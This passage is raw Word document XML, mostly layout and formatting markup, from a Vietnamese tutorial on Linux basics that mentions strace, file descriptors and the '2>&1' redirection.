                              <a:gd name="T5" fmla="*/ T4 w 557"/>
                              <a:gd name="T6" fmla="+- 0 28 -147"/>
                              <a:gd name="T7" fmla="*/ 28 h 176"/>
                              <a:gd name="T8" fmla="+- 0 1463 1440"/>
                              <a:gd name="T9" fmla="*/ T8 w 557"/>
                              <a:gd name="T10" fmla="+- 0 27 -147"/>
                              <a:gd name="T11" fmla="*/ 27 h 176"/>
                              <a:gd name="T12" fmla="+- 0 1440 1440"/>
                              <a:gd name="T13" fmla="*/ T12 w 557"/>
                              <a:gd name="T14" fmla="+- 0 1 -147"/>
                              <a:gd name="T15" fmla="*/ 1 h 176"/>
                              <a:gd name="T16" fmla="+- 0 1440 1440"/>
                              <a:gd name="T17" fmla="*/ T16 w 557"/>
                              <a:gd name="T18" fmla="+- 0 -120 -147"/>
                              <a:gd name="T19" fmla="*/ -120 h 176"/>
                              <a:gd name="T20" fmla="+- 0 1467 1440"/>
                              <a:gd name="T21" fmla="*/ T20 w 557"/>
                              <a:gd name="T22" fmla="+- 0 -147 -147"/>
                              <a:gd name="T23" fmla="*/ -147 h 176"/>
                              <a:gd name="T24" fmla="+- 0 1970 1440"/>
                              <a:gd name="T25" fmla="*/ T24 w 557"/>
                              <a:gd name="T26" fmla="+- 0 -147 -147"/>
                              <a:gd name="T27" fmla="*/ -147 h 176"/>
                              <a:gd name="T28" fmla="+- 0 1997 1440"/>
                              <a:gd name="T29" fmla="*/ T28 w 557"/>
                              <a:gd name="T30" fmla="+- 0 -120 -147"/>
                              <a:gd name="T31" fmla="*/ -120 h 176"/>
                              <a:gd name="T32" fmla="+- 0 1997 1440"/>
                              <a:gd name="T33" fmla="*/ T32 w 557"/>
                              <a:gd name="T34" fmla="+- 0 1 -147"/>
                              <a:gd name="T35" fmla="*/ 1 h 176"/>
                              <a:gd name="T36" fmla="+- 0 1974 1440"/>
                              <a:gd name="T37" fmla="*/ T36 w 557"/>
                              <a:gd name="T38" fmla="+- 0 27 -147"/>
                              <a:gd name="T39" fmla="*/ 2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176">
                                <a:moveTo>
                                  <a:pt x="530" y="175"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="27" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="23" y="174"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="530" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="557" y="27"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="557" y="148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="534" y="17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04"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="-342"/>
                            <a:ext cx="9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5A5A" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00052672" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="00052672">
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="17"/>
                                </w:rPr>
                                <w:t>str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EC96" id="Group 140" o:spid="_x0000_s1041" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:5.4pt;width:49.5pt;height:18.5pt;z-index:251654144;mso-position-horizontal-relative:page" coordorigin="1440,-342" coordsize="9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">
                <v:shape id="Freeform 103" o:spid="_x0000_s1042" style="position:absolute;left:1440;top:-148;width:557;height:176;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="55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" path="m530,175r-503,l23,174,,148,,27,27,,530,r27,27l557,148r-23,26l530,175xe" fillcolor="#868278" stroked="f">
                  <v:fill opacity="9766f"/>
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="530,28;27,28;23,27;0,1;0,-120;27,-147;530,-147;557,-120;557,1;534,27" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 104" o:spid="_x0000_s1043" type="#_x0000_t202" style="position:absolute;left:1440;top:-342;width:9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1555A5A" w14:textId="77777777" w:rsidR="00D70735" w:rsidRPr="00052672" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="00052672">
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>strace</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dùng để giám sát process, gỡ lỗi khắc phục sự cố,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E349F8" w14:textId="2F32F5FC" w:rsidR="002D4A21" w:rsidRPr="00052672" w:rsidRDefault="002D4A21" w:rsidP="00052672">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="146" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="386"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251677696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AB30026" wp14:editId="35D3A676">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>116205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="229235" cy="111760"/>
                <wp:effectExtent l="0" t="4445"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11760"/>
                          <a:chOff x="1440" y="183"/>
                          <a:chExt cx="361" cy="176"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="138"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182"/>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33"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="182"/>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1D2C" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                                <w:t>2&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0026" id="Group 137" o:spid="_x0000_s1044" style="position:absolute;margin-left:1in;margin-top:9.15pt;width:18.05pt;height:8.8pt;z-index:-251638784;mso-position-horizontal-relative:page" coordorigin="1440,183" coordsize="3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">
                <v:shape id="Picture 132" o:spid="_x0000_s1045" type="#_x0000_t75" style="position:absolute;left:1440;top:182;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">
                  <v:imagedata r:id="rId31" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 133" o:spid="_x0000_s1046" type="#_x0000_t202" style="position:absolute;left:1440;top:182;width:36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24B1D2C" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                          <w:t>2&gt;&amp;1</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mỗi</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đều</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>một</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>danh</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thể</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thao</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tác</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gọi</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>descriptor</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>được</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thể</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hiện</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bằng</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>số</w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nguyên dương:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E62C8A" w14:textId="77777777" w:rsidR="00052672" w:rsidRDefault="00052672" w:rsidP="00052672">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="321" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00052672">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23FB5606" wp14:editId="13A5C540">
            <wp:extent cx="1514686" cy="771633"/>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4686" cy="771633"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2FD59F" w14:textId="2B5BAF4C" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00052672">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="321" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lưu</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ý</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rằng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tệp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thực</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
